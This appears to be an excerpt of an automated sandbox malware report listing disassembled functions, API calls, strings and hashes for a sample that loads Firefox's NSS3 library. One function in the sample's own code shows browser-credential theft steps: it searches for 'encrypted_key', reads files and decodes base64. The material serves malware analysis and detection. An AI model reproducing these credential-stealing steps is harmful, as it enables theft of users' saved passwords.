Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$npl
API String ID: 332880674-3802556270
Opcode ID: 3fb94c9ff725abc06b478fd4fe6ed057906ac2e31701066433866bcc2e1c9551
Instruction ID: a40e1c1ff33b802336662b3add55eac1727f967f383ac2a92722c1052430ec7f
Opcode Fuzzy Hash: 3fb94c9ff725abc06b478fd4fe6ed057906ac2e31701066433866bcc2e1c9551
Instruction Fuzzy Hash: 3131E7B1601204AFDB009F54DD8CBAB37B5AB4631DF884435E4096BB12DF78990ADF9A

Function 6C622DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C622DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C622E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C622E33

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C622E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C622E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C622E81

Strings

pPin = 0x%p, xrefs: 6C622E63
ulPinLen = %d, xrefs: 6C622E7C
C_InitPIN, xrefs: 6C622DF1
hSession = 0x%x, xrefs: 6C622E0E, 6C622E1E
(CK_INVALID_HANDLE), xrefs: 6C622E2C
npl, xrefs: 6C622E99, 6C622EC4

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$npl
API String ID: 1003633598-1622512648
Opcode ID: 32da93497c877d2db951e9ed074d96f64b046d25bd255245752cc7a4a4614ff5
Instruction ID: e054e398b1dec6ea58abcef9002bc557db92ea19c707b560d1004b788fd89832
Opcode Fuzzy Hash: 32da93497c877d2db951e9ed074d96f64b046d25bd255245752cc7a4a4614ff5
Instruction Fuzzy Hash: 7331F3B1A11104AFDB109F54DD4CB8B3BB5EB4636CF884035E808A7B11DF349909CFAA

Function 6C626EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C626F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C626F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C626F53

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C626F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C626F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C626FA1

Strings

ulPartLen = %d, xrefs: 6C626F9C
C_DigestUpdate, xrefs: 6C626F11
pPart = 0x%p, xrefs: 6C626F83
hSession = 0x%x, xrefs: 6C626F2E, 6C626F3E
(CK_INVALID_HANDLE), xrefs: 6C626F4C
npl, xrefs: 6C626FB9, 6C626FE7

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$npl
API String ID: 1003633598-3316870515
Opcode ID: 8f866652ca4ca3ccde819871c08abc9bd7c7bb481c0579b50725ecac7357b92d
Instruction ID: ff9b93d57a1853b8d53b7c3bd17ef8cc65c4f3661439161e3d3e49ba114a0dd3
Opcode Fuzzy Hash: 8f866652ca4ca3ccde819871c08abc9bd7c7bb481c0579b50725ecac7357b92d
Instruction Fuzzy Hash: EA31C1B5611154AFEB109F64DD4CF9B7BB2AB4631CF884035E808A7B11DF34E948CB9A

Function 6C5EAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C5EAF47

Part of subcall function 6C6B9090: TlsGetValue.KERNEL32 ref: 6C6B90AB
Part of subcall function 6C6B9090: TlsGetValue.KERNEL32 ref: 6C6B90C9
Part of subcall function 6C6B9090: EnterCriticalSection.KERNEL32 ref: 6C6B90E5
Part of subcall function 6C6B9090: TlsGetValue.KERNEL32 ref: 6C6B9116
Part of subcall function 6C6B9090: LeaveCriticalSection.KERNEL32 ref: 6C6B913F

FreeLibrary.KERNEL32(?), ref: 6C5EAF6D
free.MOZGLUE(?), ref: 6C5EAFA4
free.MOZGLUE(?), ref: 6C5EAFAA
PR_ExitMonitor.NSS3 ref: 6C5EAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C5EAFF5
PR_ExitMonitor.NSS3 ref: 6C5EB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C5EB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C5EB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C5EB03C

Strings

Unloaded library %s, xrefs: 6C5EB023
%s decr => %d, xrefs: 6C5EAFF0

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 6313dbc03e28440b42696bdee542c1d5f708e2ee68633569c2d9bfbed1f8c895
Instruction ID: e961833415f0a4408e5b45b15f43c647ae6460e3ece0840efe2fc10c289c5a8b
Opcode Fuzzy Hash: 6313dbc03e28440b42696bdee542c1d5f708e2ee68633569c2d9bfbed1f8c895
Instruction Fuzzy Hash: 853159B9B04111ABDB01EF70DC44A05BBB4EF0A31DB544235E81997B40FB32E824C7E6

Function 6C636C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C63781D,00000000,6C62BE2C,?,6C636B1D,?,?,?,?,00000000,00000000,6C63781D), ref: 6C636C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C63781D,?,6C62BE2C,?), ref: 6C636C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C63781D), ref: 6C636C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C636C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C636C96

Part of subcall function 6C5E1240: TlsGetValue.KERNEL32(00000040,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E1267
Part of subcall function 6C5E1240: EnterCriticalSection.KERNEL32(?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E127C
Part of subcall function 6C5E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E1291
Part of subcall function 6C5E1240: PR_Unlock.NSS3(?,?,?,?,6C5E116C,NSPR_LOG_MODULES), ref: 6C5E12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C636CAA

Strings

dbm:, xrefs: 6C636C3A
sql:, xrefs: 6C636C52
rdb:, xrefs: 6C636C69
extern:, xrefs: 6C636C7E
dbm, xrefs: 6C636CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6C636C91

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 13c7018a67e8ef858041c0cd8cf1d56f201afb4255fef5896066cd01a844bea3
Instruction ID: d342e6f0ca5d38ea58b1f1bc175d7fdb972a94fe0b58edf7e2093c813a91aa65
Opcode Fuzzy Hash: 13c7018a67e8ef858041c0cd8cf1d56f201afb4255fef5896066cd01a844bea3
Instruction Fuzzy Hash: 4801A7E170233167F600677A5E5EF66255CEF8125DF142532FE0CE1942FB96D61840A9

Function 00EF0610 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00EF0647
strtok_s.MSVCRT ref: 00EF0A6F

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 61f2d2d2e42ba101a3eac7d905262961597578f1e61efbc5278e73382b7a39f9
Instruction ID: decc6da5b4f0eac1919bc4cf242fa7f00afe2e9e6f55ab8700308092a64d2742
Opcode Fuzzy Hash: 61f2d2d2e42ba101a3eac7d905262961597578f1e61efbc5278e73382b7a39f9
Instruction Fuzzy Hash: 42C182B594021D9BCF18EF60DC89FEA77B9BB54300F0045D9E609A7145EE70AA88CFA0

Function 00EF2F20 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EF2F3E
memset.MSVCRT ref: 00EF2F55

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF2F8C
lstrcat.KERNEL32(?,0132FC90), ref: 00EF2FAB
lstrcat.KERNEL32(?,?), ref: 00EF2FBF
lstrcat.KERNEL32(?,01330008), ref: 00EF2FD3

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF6CA0: GetFileAttributesA.KERNEL32(00000000,?,00EEF807,?,00000000,?,00000000,00EFE783,00EFE782), ref: 00EF6CAF

Part of subcall function 00EE96E0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9739
Part of subcall function 00EE96E0: memcmp.MSVCRT ref: 00EE9792

Part of subcall function 00EE93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
Part of subcall function 00EE93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
Part of subcall function 00EE93C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
Part of subcall function 00EE93C0: ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
Part of subcall function 00EE93C0: LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
Part of subcall function 00EE93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

Part of subcall function 00EF72D0: GlobalAlloc.KERNEL32(00000000,w0,00EF3077), ref: 00EF72E3

StrStrA.SHLWAPI(?,0132FD20), ref: 00EF308D
GlobalFree.KERNEL32(?), ref: 00EF3189

Part of subcall function 00EE94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00EE4BCE,00000000,00000000), ref: 00EE94EF
Part of subcall function 00EE94C0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4BCE,00000000,?), ref: 00EE9501
Part of subcall function 00EE94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00EE4BCE,00000000,00000000), ref: 00EE952A
Part of subcall function 00EE94C0: LocalFree.KERNEL32(?,?,?,?,00EE4BCE,00000000,?), ref: 00EE953F

Part of subcall function 00EE9800: memcmp.MSVCRT ref: 00EE981B
Part of subcall function 00EE9800: memset.MSVCRT ref: 00EE984E
Part of subcall function 00EE9800: LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

lstrcat.KERNEL32(?,00000000), ref: 00EF311A
StrCmpCA.SHLWAPI(?,00EFE496,?,?,?,?,000003E8), ref: 00EF3137
lstrcat.KERNEL32(00000000,00000000), ref: 00EF3149
lstrcat.KERNEL32(00000000,?), ref: 00EF315C
lstrcat.KERNEL32(00000000,00EFE8A0), ref: 00EF316B

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
String ID:
API String ID: 3662689742-0
Opcode ID: 2e7855a91d73edf2bd8eeb76a24f9f6dbc963d70191f67da6bbf5e47a38ca096
Instruction ID: 1dd52185d320114125e06af74bf7f7d8927f8f955b2fd3b255e412700e91be04
Opcode Fuzzy Hash: 2e7855a91d73edf2bd8eeb76a24f9f6dbc963d70191f67da6bbf5e47a38ca096
Instruction Fuzzy Hash: 2C7135B6D0021CABCB18EBB4DD89FEE73B9AB48300F004598F615A7145EA749B54CF60

Function 6C644E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C6078F8), ref: 6C644E6D

Part of subcall function 6C5E09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5E06A2,00000000,?), ref: 6C5E09F8
Part of subcall function 6C5E09E0: malloc.MOZGLUE(0000001F), ref: 6C5E0A18
Part of subcall function 6C5E09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C5E0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6078F8), ref: 6C644ED9

Part of subcall function 6C635920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C637703,?,00000000,00000000), ref: 6C635942
Part of subcall function 6C635920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C637703), ref: 6C635954
Part of subcall function 6C635920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C63596A
Part of subcall function 6C635920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C635984
Part of subcall function 6C635920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C635999
Part of subcall function 6C635920: free.MOZGLUE(00000000), ref: 6C6359BA
Part of subcall function 6C635920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6359D3
Part of subcall function 6C635920: free.MOZGLUE(00000000), ref: 6C6359F5
Part of subcall function 6C635920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C635A0A
Part of subcall function 6C635920: free.MOZGLUE(00000000), ref: 6C635A2E
Part of subcall function 6C635920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C635A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644EB3

Part of subcall function 6C644820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C644EB8,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C64484C
Part of subcall function 6C644820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C644EB8,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C64486D
Part of subcall function 6C644820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C644EB8,?), ref: 6C644884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644EC0

Part of subcall function 6C644470: TlsGetValue.KERNEL32(00000000,?,6C607296,00000000), ref: 6C644487
Part of subcall function 6C644470: EnterCriticalSection.KERNEL32(?,?,?,6C607296,00000000), ref: 6C6444A0
Part of subcall function 6C644470: PR_Unlock.NSS3(?,?,?,?,6C607296,00000000), ref: 6C6444BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644F8F
PK11_UpdateSlotAttribute.NSS3(?,6C71DCB0,00000000), ref: 6C644FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C64501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C64506B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 54e562bc244e19f844703e08e34ef55f305de111439ef88582d71a5466b4e1a6
Instruction ID: f7ce75ef2ae3ab764a3b50b7156aee79ebf682d80e665d9180dffc9c504bcad7
Opcode Fuzzy Hash: 54e562bc244e19f844703e08e34ef55f305de111439ef88582d71a5466b4e1a6
Instruction Fuzzy Hash: E551F5B5D006059BEB01AF24DC01AAA36B5FF4631DF14C535EC0A86A11FB31D965CBDA

Function 6C5EACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EACE2
malloc.MOZGLUE(00000001), ref: 6C5EACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5EAD02
TlsGetValue.KERNEL32 ref: 6C5EAD3C
calloc.MOZGLUE(00000001,?), ref: 6C5EAD8C
PR_Unlock.NSS3 ref: 6C5EADC0
free.MOZGLUE(00000000), ref: 6C5EAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C5EAE58
free.MOZGLUE(00000000), ref: 6C5EAE69
free.MOZGLUE(?), ref: 6C5EAE78
PR_Unlock.NSS3 ref: 6C5EAE8C
free.MOZGLUE(?), ref: 6C5EAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5EAEC7

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: a0aa7d1888642d06b8102ebe90dd7ccc04dcc5b9957a7f020a12dc7784a5c099
Instruction ID: d388410bdaf1886ca0160b9579084854a8979b69fae0adaa692d5daee326e8f4
Opcode Fuzzy Hash: a0aa7d1888642d06b8102ebe90dd7ccc04dcc5b9957a7f020a12dc7784a5c099
Instruction Fuzzy Hash: A051C1B0E002169BDF00EF78CD456AE7BB4FB0A34AF544576D815A3B50DB31A908CBE6

Function 6C6C4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C6C4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6C4CFD
sqlite3_value_text16.NSS3(?), ref: 6C6C4D44

Strings

unknown error, xrefs: 6C6C4D56
invalid, xrefs: 6C6C4CF1
no more rows available, xrefs: 6C6C4D2E
abort due to ROLLBACK, xrefs: 6C6C4D27, 6C6C4D33
bad parameter or other API misuse, xrefs: 6C6C4D05
API call with %s database connection pointer, xrefs: 6C6C4CF6
out of memory, xrefs: 6C6C4C78, 6C6C4C9E
another row available, xrefs: 6C6C4D20

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 4607bcccdf9cc516bffd05573f43783b98c368855bc8bb1b75c43aa17b1ec56f
Instruction ID: 6ada415251ff45e854e5db0539204abdf7d5f966905af6ba06267aac4bcce62c
Opcode Fuzzy Hash: 4607bcccdf9cc516bffd05573f43783b98c368855bc8bb1b75c43aa17b1ec56f
Instruction Fuzzy Hash: F63134B2F08851A7D718D624A8017F5B3A5FB82318F650136D4284BE68CBA5BC52C3EF

Function 6C622CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C622CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C622D07

Part of subcall function 6C7009D0: PR_Now.NSS3 ref: 6C700A22
Part of subcall function 6C7009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C700A35
Part of subcall function 6C7009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C700A66
Part of subcall function 6C7009D0: PR_GetCurrentThread.NSS3 ref: 6C700A70
